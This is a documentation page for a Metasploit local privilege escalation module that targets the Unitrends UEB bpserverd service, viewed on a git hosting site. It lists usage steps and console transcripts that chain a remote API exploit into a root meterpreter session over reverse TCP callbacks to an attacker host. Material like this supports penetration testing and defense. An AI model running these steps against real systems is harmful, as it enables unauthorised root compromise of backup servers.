adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
edb94e9ef581c4cb2f856428fe5e05eb470d7fbd
metasploit-gs/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.rb
T
h00die 38a99ac90a ueb privesc updates
2018-11-27 21:18:05 -05:00

96 lines
3.2 KiB
Ruby
Raw Blame History

## Vulnerable Application
It was discovered that the Unitrends `bpserverd` proprietary protocol, as exposed via `xinetd`,
has an issue in which its authentication can be bypassed. A remote attacker could use this
issue to execute arbitrary commands with root privilege on the target system.
This is very similar to `exploits/linux/misc/ueb9_bpserverd` however it runs against the
`localhost` by dropping a python script on the local file system. Unitrends stopped
`bpserverd` from listening remotely on version 10.
## Vulnerable Application
This module has been tested successfully on:
* UEB 9.2
* UEB 10.0
## Verification Steps
1. Get a user shell with `exploit/linux/http/ueb_api_rce` with `set target 1`
2. ```use exploit/linux/local/ueb_bpserverd_privesc ```
3. ```set session [SESSION]```
4. ```exploit```
5. A root meterpreter session should have been opened successfully
## Scenarios
### UEB 10.0 on CentOS 6.5
```
msf > use exploit/linux/local/ueb_priv_esc
msf exploit(linux/local/ueb_priv_esc) > set session 4
session => 4
msf exploit(linux/local/ueb_priv_esc) > exploit
[*] Started reverse TCP handler on 15.0.0.177:4444
[*] Writing payload executable to '/tmp/pEFoythF'
[*] Writing privesc script to '/tmp/CTZSovJR'
[*] Fixing permissions
[*] Sending stage (857352 bytes) to 10.20.1.202
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
[+] Deleted /tmp/pEFoythF
[+] Deleted /tmp/CTZSovJR
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
### UEB 9.2 on CentOS 6
```
resource (ueb_priv.rb)> use exploit/linux/http/ueb_api_rce
resource (ueb_priv.rb)> set rhost 1.1.1.1
rhost => 1.1.1.1
resource (ueb_priv.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (ueb_priv.rb)> set target 1
target => 1
resource (ueb_priv.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress - 19.76% done (164/830 bytes)
[*] Command Stager progress - 39.16% done (325/830 bytes)
[*] Command Stager progress - 56.87% done (472/830 bytes)
[*] Command Stager progress - 74.82% done (621/830 bytes)
[*] Command Stager progress - 92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:40216) at 2018-11-15 20:03:46 -0500
[*] Command Stager progress - 126.63% done (1051/830 bytes)
meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer : 1.1.1.1
OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > background
[*] Backgrounding session 1...
resource (ueb_priv.rb)> use exploit/linux/local/ueb_bpserverd_privesc
resource (ueb_priv.rb)> set session 1
session => 1
resource (ueb_priv.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Writing payload executable to '/tmp/.mM0iyQvoAO'
[*] Writing privesc script to '/tmp/.sDjn0m'
[*] Fixing permissions
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:40219) at 2018-11-15 20:04:21 -0500
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
Reference in New Issue View Git Blame Copy Permalink